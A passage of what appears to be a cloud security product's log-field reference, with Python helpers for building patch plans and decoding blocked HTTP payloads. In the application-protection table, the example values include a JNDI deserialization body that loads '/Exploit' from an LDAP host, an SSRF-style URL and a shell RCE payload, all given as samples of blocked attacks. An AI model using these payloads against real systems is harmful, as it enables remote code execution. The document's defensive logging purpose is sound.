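    """Extract CVEs, matched packages and update commands from one vulnerability record."""
    ext = json.loads(record["extend_content"])
    matched = [e for e in ext.get("rpmEntityList", []) if e.get("result")]
    return {
        "vul_name": record["vul_name"],
        "host": record.get("instance_name"),
        "os": f'{ext.get("os")}:{ext.get("osRelease")}',
        "cves": list(ext.get("cveList", [])),
        "packages": [e["name"] for e in matched],
        "installed": {e["name"]: e["fullVersion"] for e in matched},
        "kernel_update": any(e.get("kernel") for e in matched),   # a kernel fix needs a reboot
        "update_cmds": list(dict.fromkeys(e["updateCmd"] for e in matched)),  # dedupe, keep order
        "patchable": bool(ext.get("rpmCanUpdate")),
    }


def plans_for(records):
    """Build a plan for every record that still represents an open finding."""
    return [remediation_plan(r) for r in records if r.get("operation") == "new"]


if __name__ == "__main__":
    print(json.dumps(remediation_plan(SAMPLE_RECORD), indent=2))
```

The `kernel` flag per package is worth surfacing separately: the update command for a kernel package completes without error, but the vulnerable code keeps running until the host is rebooted, so the ticket should not be closed on the command's exit status alone.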
CSPM-baseline logs
Field name | Description | Example |
check_item_name | The name of the check item. | Set the shortest interval between password changes |
check_item_level | The risk level of the baseline. Valid values: | medium |
check_type | The type of the check item. | Identity authentication |
instance_id | The ID of the instance. | i-2zeg4zldn8zypsfg**** |
risk_level | The severity of the risk item. Valid values: | medium |
operation | The operation. Valid values: | new |
risk_name | The name of the risk item. | Password compliance check |
sas_group_name | The server group to which the server belongs in Security Center. The risk item is detected on the server. | default |
status | The status information. Valid values: | 1 |
sub_type_alias_name | The alias of the subtype in Chinese. | Internationally Agreed Best Practices for Security - Ubuntu 16/18/20/22 Security Baseline Check |
sub_type_name | The name of the subtype. For more information about baseline subtypes, see Baseline types and subtypes. | hc_ubuntu16_cis_rules |
type_alias_name | The alias of the check type in Chinese. | Internationally Agreed Best Practices for Security |
type_name | The type of the baseline. For more information about baseline types, see Baseline types and subtypes. | cis |
uuid | The UUID of the server on which the risk item is detected. | 1ad66133a-dc82-4e5e-9659-a49e3**** |
start_time | The start timestamp, which indicates the time when the event occurs. Unit: seconds. | 1719472214 |
Security alert logs
Field name | Description | Example |
data_source | The data source. Valid values: | aegis_login_log |
detail | The details of the alert. Note The value of the detail field in the log varies based on the alert type. If you have questions about the parameters in the detail field when you view alert logs, you can submit a ticket to contact technical support. | {"loginSourceIp":"221.11.XX.XX","loginDestinationPort":22,"loginUser":"root","protocol":2,"protocolName":"SSH","clientIp":"192.168.XX.XX","loginTimes":1,"location":"Xi'an","type":"login_common_account","displayEventName":"Logon to an ECS instance by using an unusual account","status":0} |
instance_id | The ID of the instance. | i-2zeg4zldn8zypsfg**** |
internet_ip | The public IP address of the host. | 39.104.XX.XX |
intranet_ip | The private IP address of the host. | 192.168.XX.XX |
level | The risk level of the alert. Valid values: | suspicious |
name | The name of the alert. | Unusual logon - Logon to an ECS instance by using an unusual account |
operation | The operation. Valid values: | new |
status | The status of the alert. Valid values: | 1 |
unique_info | The UUID of the alert. | 2536dd765f804916a1fa3b9516b5**** |
uuid | The UUID of the server on which the alert is generated. | ad66133a-dc82-4e5e-9659-a49e3**** |
start_time | The start timestamp, which indicates the time when the event occurs. Unit: seconds. | 1719472214 |
CSPM - Cloud platform configuration check logs
Field name | Description | Example |
check_id | The ID of the check item. You can call the ListCheckResult operation to query the IDs of check items. The operation is used to query the details of the risk items that are detected in the configuration checks on cloud services. | 11 |
check_item_name | The name of the check item. | Back-to-origin settings |
instance_id | The ID of the instance. | i-2zeg4zldn8zypsfg**** |
instance_name | The name of the instance. | lsm |
instance_result | The impacts of risks. The value is a JSON string. | {"Checks":[{}],"Columns":[{"key":"RegionIdShow","search":true,"searchKey":"RegionIdKey","showName":"Region","type":"text"},{"key":"InstanceIdShow","search":true,"searchKey":"InstanceIdKey","showName":"Instance ID","type":"link"},{"key":"InstanceNameShow","search":true,"searchKey":"InstanceNameKey","showName":"Instance Name","type":"text"}]} |
instance_sub_type | The subtype of the instance. Valid values: | INSTANCE |
instance_type | The type of the instance. Valid values: | ECS |
region_id | The region ID of the instance. | cn-hangzhou |
requirement_id | The requirement item ID. You can call the ListCheckStandard operation to query the IDs of requirement items. The operation is used to query the standards of configuration checks. | 5 |
risk_level | The risk level. Valid values: | MEDIUM |
section_id | The section ID. You can call the ListCheckResult operation to query section IDs. | 1 |
standard_id | The standard ID. You can call the ListCheckStandard operation to query standard IDs. | 1 |
status | The status of the check item. Valid values: | PASS |
vendor | The cloud service provider. The value is fixed as ALIYUN. | ALIYUN |
start_time | The start timestamp, which indicates the time when the event occurs. Unit: seconds. | 1719472214 |
Network defense logs
Field name | Description | Example |
cmd | The command line of the attacked process. | nginx: master process nginx |
cur_time | The time when the attack event occurred. | 2023-09-14 09:21:59 |
decode_payload | The decoded hexadecimal payload. | POST /Services/FileService/UserFiles/ |
dst_ip | The IP address of the attacked asset. | 172.16.XX.XX |
dst_port | The port of the attacked asset. | 80 |
func | The type of the blocked event. Valid values: | payload |
rule_type | The type of the rule that is used in the blocked event. Valid values: | alinet_payload |
instance_id | The instance ID of the attacked asset. | i-2zeg4zldn8zypsfg**** |
internet_ip | The public IP address of the attacked asset. | 39.104.XX.XX |
intranet_ip | The private IP address of the attacked asset. | 192.168.XX.XX |
final_action | The defense action. The value is fixed as block. The value indicates that the attack is blocked. | block |
payload | The hexadecimal payload. | 504f5354202f20485454502f312e310d0a436f6e74656e742d547970653a20746578742f706c61696e0d0a557365722d4167656e743a20**** |
pid | The ID of the attacked process. | 7107 |
platform | The type of the operating system of the attacked asset. Valid values: | linux |
proc_path | The path to the attacked process. | /usr/sbin/nginx |
sas_group_name | The asset group to which the server belongs in Security Center. | default |
src_ip | The source IP address of the attack. | 106.11.XX.XX |
src_port | The source port of the attack. | 29575 |
uuid | The UUID of the server. | 5d83b26b-b7ca-4a0a-9267-12**** |
start_time | The start timestamp, which indicates the time when the event occurs. Unit: seconds. | 1719472214 |
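As an added example (not code from this page or from Security Center), a small normalizer for a network defense record: it decodes the hex `payload` field, extracts the HTTP request line and headers, checks that `decode_payload` is a prefix of the decoded text, and converts `start_time` to UTC. The record and its request bytes are constructed; masked (`****`) or odd-length hex is truncated rather than rejected.

```python
import binascii
import string
from datetime import datetime, timezone

# Constructed network defense log record using the field names from the table above.
# The hex payload is generated from a constructed HTTP request so the example runs
# offline; real records carry the blocked bytes as hex in `payload` and a text
# rendering (often truncated) in `decode_payload`.
_CONSTRUCTED_REQUEST = (
    b"POST /upload HTTP/1.1\r\n"
    b"Host: 172.16.0.10\r\n"
    b"Content-Type: text/plain\r\n"
    b"User-Agent: example-agent\r\n"
    b"\r\n"
    b"hello"
)
SAMPLE_EVENT = {
    "cmd": "nginx: master process nginx",
    "cur_time": "2023-09-14 09:21:59",
    "dst_ip": "172.16.0.10",
    "dst_port": 80,
    "func": "payload",
    "rule_type": "alinet_payload",
    "final_action": "block",
    "payload": _CONSTRUCTED_REQUEST.hex(),
    "decode_payload": "POST /upload HTTP/1.1",
    "src_ip": "198.51.100.7",
    "src_port": 29575,
    "pid": 7107,
    "proc_path": "/usr/sbin/nginx",
    "start_time": 1719472214,
}


def decode_hex_payload(hex_payload: str) -> bytes:
    """Turn the `payload` field back into bytes.

    Log viewers mask the tail of long values with `*`, and exports may cut a
    value mid-byte; decoding stops at the first non-hex character and drops a
    dangling odd nibble instead of raising.
    """
    n = 0
    while n < len(hex_payload) and hex_payload[n] in string.hexdigits:
        n += 1
    n -= n % 2
    return binascii.unhexlify(hex_payload[:n])


def parse_http_request(raw: bytes) -> dict:
    """Split a decoded request into request line, headers and body.

    latin-1 is used because blocked payloads are frequently not valid UTF-8;
    `complete` is False when the header/body separator never arrived (truncation).
    """
    head, sep, body = raw.partition(b"\r\n\r\n")
    lines = head.decode("latin-1").split("\r\n")
    method, target, version = (lines[0].split(" ", 2) + ["", "", ""])[:3]
    headers = {}
    for line in lines[1:]:
        name, colon, value = line.partition(":")
        if colon:
            headers[name.strip().lower()] = value.strip()
    return {"method": method, "target": target, "version": version,
            "headers": headers, "body": body, "complete": bool(sep)}


def normalize_event(event: dict) -> dict:
    """Flatten one record into the fields an analyst or SIEM rule would key on."""
    raw = decode_hex_payload(event["payload"])
    req = parse_http_request(raw)
    text = raw.decode("latin-1")
    return {
        "time": datetime.fromtimestamp(event["start_time"], tz=timezone.utc).isoformat(),
        "src": f'{event["src_ip"]}:{event["src_port"]}',
        "dst": f'{event["dst_ip"]}:{event["dst_port"]}',
        "process": f'{event["proc_path"]}[{event["pid"]}]',
        "action": event["final_action"],
        "rule_type": event["rule_type"],
        "method": req["method"],
        "target": req["target"],
        "host_header": req["headers"].get("host"),
        "user_agent": req["headers"].get("user-agent"),
        # decode_payload should be a text rendering of payload; a mismatch points at a
        # decoding problem or an altered record and is worth surfacing in triage.
        "payload_consistent": text.startswith(event["decode_payload"]),
        "payload_bytes": len(raw),
    }


if __name__ == "__main__":
    for key, value in normalize_event(SAMPLE_EVENT).items():
        print(f"{key:>18}: {value}")
```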
Application protection logs
Field name | Description | Example |
app_dir | The directory in which the application is stored. | /usr/local/aegis/rasp/apps/1111 |
app_id | The ID of the application. | 6492a391fc9b4e2aad94**** |
app_name | The name of the application. | test |
confidence_level | The confidence level of the detection algorithm. Valid values: | low |
request_body | The information about the request body. | {"@type":"com.sun.rowset.JdbcRowSetImpl","dataSourceName":"ldap://172.220.XX.XX:1389/Exploit","autoCommit":true} |
request_content_length | The length of the request body. | 112 |
data | The data captured by the RASP hook, such as the intercepted command and its arguments. | {"cmd":"bash -c kill -0 -- -'31098' "} |
headers | The information about the request header. | {"content-length":"112","referer":"http://120.26.XX.XX:8080/demo/Serial","accept-language":"zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2","origin":"http://120.26.XX.XX:8080","host":"120.26.XX.XX:8080","content-type":"application/json","connection":"keep-alive","x-forwarded-for":"1.1.XX.XX","accept-encoding":"gzip, deflate","user-agent":"msnbot","accept":"application/json, text/plain, */*"} |
hostname | The name of the host or network device. | testhostname |
host_ip | The private IP address of the host. | 172.16.XX.XX |
is_cliped | Indicates whether the log is truncated because it is too long. Valid values: | false |
jdk_version | The JDK version. | 1.8.0_292 |
message | The description of the alert. | Unsafe class serial. |
request_method | The request method. | Post |
platform | The type of the operating system. | Linux |
arch | The architecture of the operating system. | amd64 |
kernel_version | The kernel version of the operating system. | 3.10.0-1160.59.1.el7.x86_64 |
param | The request parameter. In most cases, the parameter is in one of the following formats: | {"url":["http://127.0.0.1.xip.io"]} |
payload | The attack payload. | bash -c kill -0 -- -'31098' |
payload_length | The length of the attack payload. | 27 |
rasp_id | The ID of the Runtime Application Self Protection (RASP) agent. | fa00223c8420e256c0c98ca0bd0d**** |
rasp_version | The version of the RASP agent. | 0.8.5 |
src_ip | The IP address from which the request is initiated. | 172.0.XX.XX |
final_action | The handling result of the alert. Valid values: | block |
rule_action | The alert handling action that is specified in the application protection rule. Valid values: | block |
risk_level | The risk level. Valid values: | high |
stacktrace | The stack information. | [java.io.FileInputStream.<init>(FileInputStream.java:123), java.io.FileInputStream.<init>(FileInputStream.java:93), com.example.vulns.controller.FileController.IORead(FileController.java:75), sun.reflect.NativeMethodAccessorImpl.invoke0(Native Method), sun.reflect.NativeMethodAccessorImpl.invoke(NativeMethodAccessorImpl.java:62)......] |
time | The time when the alert was generated. | 2023-10-09 15:19:15 |
timestamp | The timestamp when the alert was generated. Unit: milliseconds. | 1696835955070 |
type | The type of the attack. Valid values: | rce |
url | The request URL. | http://127.0.0.1:999/xxx |
rasp_attack_uuid | The UUID of the attack. | 18823b23-7ad4-47c0-b5ac-e5f036a2**** |
uuid | The UUID of the host. | 23f7ca61-e271-4a8e-bf5f-165596a16**** |
internet_ip | The public IP address of the host. | 1.2.XX.XX |
intranet_ip | The private IP address of the host. | 172.16.XX.XX |
sas_group_name | The group to which the server belongs in Security Center. | Group 1 |
instance_id | The instance ID of the host. | i-wz995eivg28f1m** |
start_time | The start timestamp, which indicates the time when the event occurs. Unit: seconds. | 1719472214 |
Malicious file detection logs
Field name | Description | Example |
bucket_name | The name of the OSS bucket. | ***-test |
event_id | The ID of the alert. | 802210 |
event_name | The name of the alert. | Mining program |
md5 | The MD5 hash value of the file. | 6bc2bc******53d409b1 |
sha256 | The SHA-256 hash value of the file. | f038f9525******7772981e87f85 |
result | The detection result. Valid values: | 0 |
file_path | The path to the file. | test.zip/bin_test |
etag | The ID of the OSS object. | 6BC2B******853D409B1 |
risk_level | The risk level. Valid values: | remind |
source | The check method. Valid values: | OSS |
parent_md5 | The MD5 hash value of the parent file or the compressed package file. | 3d0f8045bb9****** |
parent_sha256 | The SHA-256 hash value of the parent file or the compressed package file. | 69b643d6******a3fb859fa |
parent_file_path | The name of the parent file or the compressed package file. | test.zip |
start_time | The start timestamp, which indicates the time when the event occurs. Unit: seconds. | 1719472214 |
Core file monitoring event log
Field name | Description | Example |
start_time | The timestamp when the event last happened. Unit: seconds. | 1718678414 |
uuid | The UUID of the server. | 5d83b26b-b**a-4**a-9267-12**** |
file_path | The path to the file. | /etc/passwd |
proc_path | The path to the process. | /usr/bin/bash |
rule_id | The ID of the hit rule. | 123 |
rule_name | The name of the rule. | file_test_rule |
cmdline | The command line. | bash /opt/a |
operation | The operation performed on the file. | READ |
risk_level | The risk level. | 2 |
pid | The process ID. | 45324 |
proc_permission | The permissions to run the process. | rwxrwxrwx |
instance_id | The instance ID. | i-wz995eivg2**** |
internet_ip | The public IP address. | 192.0.2.1 |
intranet_ip | The private IP address. | 172.16.0.1 |
instance_name | The instance name. | aegis-test |
platform | The operating system type. | Linux |
Agentless detection logs
Common fields for vulnerabilities, baselines, and malicious samples
Field name | Description | Example |
uuid | Server UUID. | ad66133a-dc82-4e5e-9659-a49e3**** |
instance_id | Instance ID. | i-2zeg4zldn8zypsfg**** |
internet_ip | Public IP address of the asset. | 39.104.XX.XX |
intranet_ip | Private IP address of the asset. | 192.168.XX.XX |
sas_group_name | Asset group of the server in Security Center. | default |
start_time | Start timestamp in seconds, also used to indicate when the event occurred. | 1719472214 |
Vulnerability risk fields
Field name | Description | Example |
vul_name | Vulnerability name. | imgsca:java:gson:AVD-2022-25647 |
vul_alias_name | Vulnerability alias. | gson code issue vulnerability (CVE-2022-25647) |
vul_primary_id | Vulnerability business primary key ID. | 990174361 |
type | Vulnerability type. Valid values: | sca |
alert_level | Vulnerability risk level. Valid values: | asap |
instance_name | Host name. | hhht-linux-*** |
operation | Vulnerability handling action. Valid values: | new |
status | Vulnerability status information. Valid values: | 1 |
tag | Vulnerability tag. Valid values: Note: Tags for other types of vulnerabilities are random strings. | oval |
Baseline check fields
Field name | Description | Example |
check_item_name | Check item name. | Set password expiration time |
check_item_level | Check item risk level. Valid values: | high |
check_type | Check item type. | Identity authentication |
risk_level | Risk item level. Valid values: | low |
operation | Operation information. Valid values: | new |
risk_name | Name of the check item with risk. | Password policy compliance detection |
status | Check item status information. Valid values: | 1 |
sub_type_alias_name | Subtype alias (Chinese). | Alibaba Cloud Standard-CentOS Linux 7/8 Security Baseline |
sub_type_name | Baseline subtype name. For baseline subtype values, see Baseline types and subtypes. | hc_centos7 |
type_name | Type name. | hc_best_security |
type_alias_name | Type alias (Chinese). | Best security practices |
container_id | Container ID. | b564567427272d46f9b1cc4ade06a85fdf55075c06fdb870818d5925fa86**** |
container_name | Container name. | k8s_gamify-answer-bol_gamify-answer-bol-5-6876d5dc78-vf6rb_study-gamify-answer-bol_483a1ed1-28b7-11eb-bc35-00163e01****_0 |
Malicious sample fields
Field name | Description | Example |
alert_level | Alert event risk level. Valid values: | suspicious |
alert_name | Malicious sample alert name. | Suspicious Process-SSH-based |
operation | Operation information. Valid values: | new |
status | Malicious sample risk status information. Valid values: | 0 |
suspicious_event_id | Alert event ID. | 909361 |
Sensitive file fields
Field name | Description | Example |
alert_level | Risk level. Valid values: | high |
rule_name | File type name. | ionic token |
file_path | Sensitive file path. | /Windows/Microsoft.NET/assembly/GAC_MSIL/System.WorkflowServices/v4.0_4.0.0.0__31bf3856ad36****/System.WorkflowServices.dll |
result | Check result. | {"result":"[\"[\\\"mysql-uqjtwadmin-xxx"} |
Appendix
Baseline types and subtypes
Type | Subtype | Description |
hc_exploit | hc_exploit_redis | High risk exploit - Redis unauthorized access high exploit vulnerability risk |
| hc_exploit_activemq | High risk exploit - ActiveMQ unauthorized access high exploit vulnerability risk |
| hc_exploit_couchdb | High risk exploit - CouchDB unauthorized access high exploit risk |
| hc_exploit_docker | High risk exploit - Docker unauthorized access high vulnerability risk |
| hc_exploit_es | High risk exploit - Elasticsearch unauthorized access high exploit vulnerability risk |
| hc_exploit_hadoop | High risk exploit - Hadoop unauthorized access high exploit vulnerability risk |
| hc_exploit_jboss | High risk exploit - Jboss unauthorized access high exploit vulnerability risk |
| hc_exploit_jenkins | High risk exploit - Jenkins unauthorized access high exploit vulnerability risk |
| hc_exploit_k8s_api | High risk exploit - Kubernetes Apiserver unauthorized access high exploit vulnerability risk |
| hc_exploit_ldap | High risk exploit - LDAP unauthorized access high exploit vulnerability risk (Windows) |
| hc_exploit_ldap_linux | High risk exploit - OpenLDAP unauthorized access vulnerability baseline (Linux) |
| hc_exploit_memcache | High risk exploit - Memcached unauthorized access high exploit vulnerability risk |
| hc_exploit_mongo | High risk exploit - Mongodb unauthorized access high exploit vulnerability risk |
| hc_exploit_pgsql | High risk exploit - PostgreSQL unauthorized access high risk baseline |
| hc_exploit_rabbitmq | High risk exploit - RabbitMQ unauthorized access high exploit vulnerability risk |
| hc_exploit_rsync | High risk exploit - rsync unauthorized access high exploit vulnerability risk |
| hc_exploit_tomcat | High risk exploit - Apache Tomcat AJP File Read/Inclusion Vulnerability |
| hc_exploit_zookeeper | High risk exploit - ZooKeeper unauthorized access high exploit vulnerability risk |
hc_container | hc_docker | Alibaba Cloud Standard - Docker Security Baseline Check |
| hc_middleware_ack_master | Kubernetes (ACK) Master Internationally Agreed Best Practices for Security |
| hc_middleware_ack_node | Kubernetes (ACK) Node Internationally Agreed Best Practices for Security |
| hc_middleware_k8s | Alibaba Cloud Standard - Kubernetes Master Security Baseline Check |
| hc_middleware_k8s_node | Alibaba Cloud Standard - Kubernetes Node Security Baseline Check |
cis | hc_suse15_djbh | SUSE Linux 15 Baseline for China classified protection of cybersecurity - Level III |
| hc_aliyun_linux3_djbh_l3 | Alibaba Cloud Linux 3 Baseline for China classified protection of cybersecurity - Level III |
| hc_aliyun_linux_djbh_l3 | Alibaba Cloud Linux/Aliyun Linux 2 Baseline for China classified protection of cybersecurity - Level III |
| hc_bind_djbh | China's Level 3 Protection of Cybersecurity - Bind Compliance Baseline Check |
| hc_centos6_djbh_l3 | CentOS Linux 6 Baseline for China classified protection of cybersecurity - Level III |
| hc_centos7_djbh_l3 | CentOS Linux 7 Baseline for China classified protection of cybersecurity - Level III |
| hc_centos8_djbh_l3 | CentOS Linux 8 Baseline for China classified protection of cybersecurity - Level III |
| hc_debian_djbh_l3 | Debian Linux 8/9/10 Baseline for China classified protection of cybersecurity - Level III |
| hc_iis_djbh | IIS Baseline for China classified protection of cybersecurity - Level III |
| hc_informix_djbh | China's Level 3 Protection of Cybersecurity - Informix Compliance Baseline Check |
| hc_jboss_djbh | China's Level 3 Protection of Cybersecurity - Jboss 6/7 Compliance Baseline Check |
| hc_mongo_djbh | MongoDB Baseline for China classified protection of cybersecurity - Level III |
| hc_mssql_djbh | China's Level 3 Protection of Cybersecurity - SQL Server Compliance Baseline Check |
| hc_mysql_djbh | China's Level 3 Protection of Cybersecurity - MySQL Compliance Baseline Check |
| hc_nginx_djbh | China's Level 3 Protection of Cybersecurity - Nginx Compliance Baseline Check |
| hc_oracle_djbh | China's Level 3 Protection of Cybersecurity - Oracle Compliance Baseline Check |
| hc_pgsql_djbh | China's Level 3 Protection of Cybersecurity - PostgreSQL Compliance Baseline Check |
| hc_redhat6_djbh_l3 | China's Level 3 Protection of Cybersecurity - Red Hat Enterprise Linux 6 Compliance Baseline Check |
| hc_redhat_djbh_l3 | China's Level 3 Protection of Cybersecurity - Red Hat Enterprise Linux 7 Compliance Baseline Check |
| hc_redis_djbh | Redis Baseline for China classified protection of cybersecurity - Level III |
| hc_suse10_djbh_l3 | SUSE Linux 10 Baseline for China classified protection of cybersecurity - Level III |
| hc_suse12_djbh_l3 | SUSE Linux 12 Baseline for China classified protection of cybersecurity - Level III |
| hc_suse_djbh_l3 | SUSE Linux 11 Baseline for China classified protection of cybersecurity - Level III |
| hc_ubuntu14_djbh_l3 | Ubuntu 14 Baseline for China classified protection of cybersecurity - Level III |
| hc_ubuntu_djbh_l3 | China's Level 3 Protection of Cybersecurity - Ubuntu 16/18/20 Compliance Baseline Check |
| hc_was_djbh | China's Level 3 Protection of Cybersecurity - WebSphere Application Server Compliance Baseline Check |
| hc_weblogic_djbh | WebLogic Baseline for China classified protection of cybersecurity - Level III |
| hc_win2008_djbh_l3 | China's Level 3 Protection of Cybersecurity - Windows Server 2008 R2 Compliance Baseline Check |
| hc_win2012_djbh_l3 | Windows 2012 R2 Baseline for China classified protection of cybersecurity - Level III |
| hc_win2016_djbh_l3 | Windows 2016/2019 Baseline for China classified protection of cybersecurity - Level III |
| hc_aliyun_linux_djbh_l2 | Alibaba Cloud Linux/Aliyun Linux 2 Baseline for China classified protection of cybersecurity - Level II |
| hc_centos6_djbh_l2 | CentOS Linux 6 Baseline for China classified protection of cybersecurity - Level II |
| hc_centos7_djbh_l2 | CentOS Linux 7 Baseline for China classified protection of cybersecurity - Level II |
| hc_debian_djbh_l2 | Debian Linux 8 Baseline for China classified protection of cybersecurity - Level II |
| hc_redhat7_djbh_l2 | Red Hat Linux 7 Baseline for China classified protection of cybersecurity - Level II |
| hc_ubuntu_djbh_l2 | Ubuntu 16/18 Baseline for China classified protection of cybersecurity - Level II |
| hc_win2008_djbh_l2 | Windows 2008 R2 Baseline for China classified protection of cybersecurity - Level II |
| hc_win2012_djbh_l2 | Windows 2012 R2 Baseline for China classified protection of cybersecurity - Level II |
| hc_win2016_djbh_l2 | Windows 2016/2019 Baseline for China classified protection of cybersecurity - Level II |
| hc_aliyun_linux_cis | Alibaba Cloud Linux 2 Internationally Agreed Best Practices for Security |
| hc_centos6_cis_rules | CentOS Linux 6 LTS Internationally Agreed Best Practices for Security |
| hc_centos7_cis_rules | CentOS Linux 7 LTS Internationally Agreed Best Practices for Security |
| hc_centos8_cis_rules | CentOS Linux 8 LTS Internationally Agreed Best Practices for Security |
| hc_debian8_cis_rules | Debian Linux 8 Internationally Agreed Best Practices for Security |
| hc_ubuntu14_cis_rules | Ubuntu 14 LTS Internationally Agreed Best Practices for Security |
| hc_ubuntu16_cis_rules | Ubuntu 16/18/20 LTS Internationally Agreed Best Practices for Security |
| hc_win2008_cis_rules | Windows Server 2008 R2 Internationally Agreed Best Practices for Security |
| hc_win2012_cis_rules | Windows Server 2012 R2 Internationally Agreed Best Practices for Security |
| hc_win2016_cis_rules | Windows Server 2016/2019 R2 Internationally Agreed Best Practices for Security |
| hc_kylin_djbh_l3 | China's Level 3 Protection of Cybersecurity - Kylin Compliance Baseline Check |
| hc_uos_djbh_l3 | China's Level 3 Protection of Cybersecurity - UOS Compliance Baseline Check |
hc_best_security | hc_aliyun_linux | Alibaba Cloud Linux/Aliyun Linux 2 Benchmark |
| hc_centos6 | Alibaba Cloud Standard - CentOS Linux 6 Security Baseline Check |
| hc_centos7 | Alibaba Cloud Standard - CentOS Linux 7/8 Security Baseline Check |
| hc_debian | Alibaba Cloud Standard - Debian Linux 8/9/10 Security Baseline |
| hc_redhat6 | Alibaba Cloud Standard - Red Hat Enterprise Linux 6 Security Baseline Check |
| hc_redhat7 | Alibaba Cloud Standard - Red Hat Enterprise Linux 7/8 Security Baseline Check |
| hc_ubuntu | Alibaba Cloud Standard - Ubuntu Security Baseline |
| hc_windows_2008 | Alibaba Cloud Standard - Windows Server 2008 R2 Security Baseline Check |
| hc_windows_2012 | Alibaba Cloud Standard - Windows 2012 R2 Security Baseline |
| hc_windows_2016 | Alibaba Cloud Standard - Windows 2016/2019 Security Baseline |
| hc_db_mssql | Alibaba Cloud Standard - SQL Server Security Baseline Check |
| hc_memcached_ali | Alibaba Cloud Standard - Memcached Security Baseline Check |
| hc_mongodb | Alibaba Cloud Standard - MongoDB 3.x Security Baseline Check |
| hc_mysql_ali | Alibaba Cloud Standard - MySQL Security Baseline Check |
| hc_oracle | Alibaba Cloud Standard - Oracle 11g Security Baseline Check |
| hc_pgsql_ali | Alibaba Cloud Standard - PostgreSQL Security Initialization Check |
| hc_redis_ali | Alibaba Cloud Standard - Redis Security Baseline Check |
| hc_apache | Alibaba Cloud Standard - Apache Security Baseline Check |
| hc_iis_8 | Alibaba Cloud Standard - IIS 8 Security Baseline Check |
| hc_nginx_linux | Alibaba Cloud Standard - Nginx Security Baseline Check |
| hc_suse15 | Alibaba Cloud Standard - SUSE Linux 15 Security Baseline Check |
| tomcat7 | Alibaba Cloud Standard - Apache Tomcat Security Baseline |
weak_password | hc_mongodb_pwd | Weak password - MongoDB weak password baseline (supports version 2.x) |
| hc_weakpwd_ftp_linux | Weak password - FTP login weak password baseline |
| hc_weakpwd_linux_sys | Weak password - Linux system login weak password baseline |
| hc_weakpwd_mongodb3 | Weak password - MongoDB weak password baseline |
| hc_weakpwd_mssql | Weak password - SQL Server DB login weak password baseline |
| hc_weakpwd_mysql_linux | Weak password - MySQL DB login weak password baseline |
| hc_weakpwd_mysql_win | Weak password - MySQL DB login weak password baseline (Windows version) |
| hc_weakpwd_openldap | Weak password - OpenLDAP login weak password baseline |
| hc_weakpwd_oracle | Weak password - Oracle login weak password detection |
| hc_weakpwd_pgsql | Weak password - PostgreSQL DB login weak password baseline |
| hc_weakpwd_pptp | Weak password - pptpd login weak password baseline |
| hc_weakpwd_redis_linux | Weak password - Redis DB login weak password baseline |
| hc_weakpwd_rsync | Weak password - rsync login weak password baseline |
| hc_weakpwd_svn | Weak password - svn login weak password baseline |
| hc_weakpwd_tomcat_linux | Weak password - Apache Tomcat console weak password baseline |
| hc_weakpwd_vnc | Weak password - VNC Server weak password check |
| hc_weakpwd_weblogic | Weak password - WebLogic 12c login weak password detection |
| hc_weakpwd_win_sys | Weak password - Windows system login weak password baseline |
Network log fields
Web access logs
Field name | Description | Example |
response_content_length | The length of the message body. Unit: bytes. | 612 |
dst_ip | The IP address of the destination host. | 39.105.XX.XX |
dst_port | The port of the destination host. | 80 |
host | The IP address or domain name of the destination host. | 39.105.XX.XX |
jump_location | The redirection address. | 123 |
request_method | The HTTP request method. | GET |
http_referer | The HTTP Referer header, which contains the URL of the web page from which the request for the resource was made. | www.example.com |
request_datetime | The time when the request is initiated. | 2024-08-01 06:59:28 |
status | The HTTP status code. | 200 |
content_type | The type of the request content. | text/plain;charset=utf-8 |
response_content_type | The type of the response content. | text/plain; charset=utf-8 |
src_ip | The source IP address. | 31.220.XX.XX |
src_port | The source port. | 59524 |
request_uri | The request URI. | /report |
http_user_agent | The user agent that initiates the request. | okhttp/3.2.0 |
http_x_forward_for | The HTTP request header that records the originating IP address of the client. | 31.220.XX.XX |
DNS logs
Field name | Description | Example |
additional | The additional field that is returned by the DNS server and records information such as the CNAME record, MX record, and PTR record. | N/A |
additional_num | The number of additional records returned by the DNS server. | 0 |
answer | The DNS answer returned by the DNS server, which indicates the resolution results. A DNS answer contains the IP address to which the requested domain name is resolved or other information such as the A record and the AAAA record. | example.com A IN 52 1.2.XX.XX |
answer_num | The number of DNS answers. | 1 |
authority | The authority field returned by the DNS server. An authority is the DNS server that manages and resolves the domain name. An authority field contains information about a DNS server that provides the DNS record for the requested domain name, such as the NS record. | NS IN 17597 |
authority_num | The number of authorities. | 1 |
client_subnet | The subnet of the client. | 59.152.XX.XX |
dst_ip | The destination IP address. | 106.55.XX.XX |
dst_port | The destination port. | 53 |
net_connect_dir | The direction of data transmission. Valid values: | out |
qid | The ID of the query. | 13551 |
query_name | The domain name that is queried. | example.com |
query_type | The type of the query. | A |
query_datetime | The time of the query. | 2024-08-01 08:33:58 |
rcode | The response code returned by the DNS server, which indicates the DNS resolution result. | 0 |
region | The ID of the source region. Valid values: | 1 |
response_datetime | The response time of the DNS server. | 2024-08-01 08:31:25 |
src_ip | The source IP address. | 106.11.XX.XX |
src_port | The source port. | 22 |
Network session logs
Field name | Description | Example |
asset_type | The type of the asset from which the logs are collected. Valid values: | ECS |
dst_ip | The destination IP address. | 119.96.XX.XX |
dst_port | The destination port. | 443 |
net_connect_dir | The direction of the session. The value is fixed as out. | out |
l4_proto | The type of the protocol. Valid values: | tcp |
session_time | The time when the session starts. | 2024-08-01 08:31:18 |
src_ip | The source IP address. | 121.40.XX.XX |
src_port | The source port. | 53602 |
Local DNS logs
Field name | Description | Example |
anwser_name | The name of the DNS answer, which indicates the domain name associated with the resource record. | example.com |
answer_rdata | The resource data (RDATA) field of the DNS answer, which holds the value of the resolution result. | 106.11.XX.XX |
answer_ttl | The time to live (TTL) of the DNS answer. Unit: seconds. | 600 |
answer_type | The type of the DNS answer. Valid values: | 1 |
dst_ip | The destination IP address. By default, the value is the IP address written as a decimal integer. | 323223**** |
dst_port | The destination port. | 53 |
group_id | The group ID. The same group ID indicates the same DNS request or response. | 3 |
host | The name of the host. | hostname |
id | The ID of the query, which identifies a DNS request or DNS response. | 64588 |
instance_id | The ID of the instance. | i-2zeg4zldn8zypsfg**** |
internet_ip | The public IP address that is included in the DNS request or response. | 121.40.XX.XX |
ip_ttl | The TTL of the IP packet in the DNS request or response. | 64 |
query_name | The domain name that is queried. | example.com |
query_type | The type of the query. Valid values: | 1 |
src_ip | The IP address from which the DNS request or response is initiated. By default, the value is the IP address written as a decimal integer. | 168427**** |
